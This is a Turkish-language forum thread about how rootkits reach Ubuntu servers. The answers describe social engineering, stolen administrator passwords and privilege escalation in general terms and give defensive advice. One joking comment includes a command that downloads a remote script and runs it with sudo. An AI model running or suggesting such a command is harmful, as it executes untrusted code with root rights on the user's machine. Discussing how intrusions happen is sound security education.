Rootkit'ler ubuntu sunucusuna nasıl kurulur?


11

Kök setlerini kontrol etmek için birkaç gönderi gördüm, ancak linux sistemine nasıl ulaştıklarına dair herhangi bir bilgi bulamadım. Özellikle bir php web sitesinde bir hata istismar (evet burada drupageddon hakkında konuşuyorum ) bir rootkit yüklemek mümkün olsa bile root olarak değil sadece web sunucusu (www-data) olarak çalıştırabilirsiniz. Bunların nasıl kurulduğuyla ilgili bulduğum çok az bilgi, onları yüklemek için kök olmanız gerektiğini gösteriyor ( buraya bakın ).


6
Küçük bir howto yazdım, isterseniz yükleyebilirsiniz? sadece yazınwget http://mydomain/script.sh;sudo ./script.sh
Nanne

1
Oh, BU yanıtı bekliyordum!
Katil Üstü

Yanıtlar:


9

Ben olsaydım şu yöntemi ikna ederim:

  • Kullanıcının bir yazılım parçası indirip yüklemesini sağlayın (# 1). Bu yazılımın istenen yazılımı yüklemesini sağlayın. Bu uygulamanın içindeki bir binairy blobunu gizlemek yazılımı indirmenize izin verir (yani ftp, wget vb. İçin kullanabileceğiniz bir araç).
  • Yönetici hesabını sor (# 2) ve rootkit'i indirmek ve yüklemek için bir ftp, wget örneği kullanmak için bunu kullanın.

# 1 ile ilgili olarak: bir kullanıcı Linux kullanırken asla rastgele yazılım indirmemelidir; yazılımı yüklemek için uygun kanalları (Ubuntu Yazılım Merkezi) kullanın. Uygun kanalların dışında indirilmesi gereken bir yazılımsa, indirme kaynağına güvenilebildiğinden emin olun. Apache yazılımının veya MySQL'in en son sürümlerini düşünün. Uygulamanın bütünlüğü hakkında farklı sosyal medyayı kontrol etmeden rastgele yazılım indirmeyi dolaşmayın. Microsoft yazılımı hiçbir zaman merkezi hale getirmedi; yazılımla uğraşan birçok insanla sonuçlandı, böylece kullanıcı tabanları sertleşti, ancak bu da bilgisayarlara girmeyi ve satabilecekleri verileri toplamaya başlamayı kolaylaştırdı.

# 2 ile ilgili: ölümcül kullanıcı hatası. Neden sorulduğunu bilmediğiniz sürece yönetici şifrenizi asla hiç yazmayın.


8

Evet, genel olarak bir rootkit kurmak için root izni gereklidir. Kök setlerinin çoğu çekirdeğe yüklenmiş bir modül içerir, diğer sadece kök tarafından kullanılan diğer üzerine yazma aracıdır. Düzgün ayarlanmış ve mükemmel bir sistemde, kök kitini kök ayrıcalıkları olmadan kurmanın bir yolu olmaz, ancak ...

... sistem güvenliğinde sistemi güvensiz hale getiren sorunlar olabilir. ... bir ayrıcalık yükselmesine izin veren güvenlik hataları olabilir ... Köt izinleri olan bir kullanıcıyı kötü bir şey çalıştırmak için kandırmanın yolları olabilir.

Yollar davetsiz misafirin hayal gücü kadar sınırsızdır.

Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.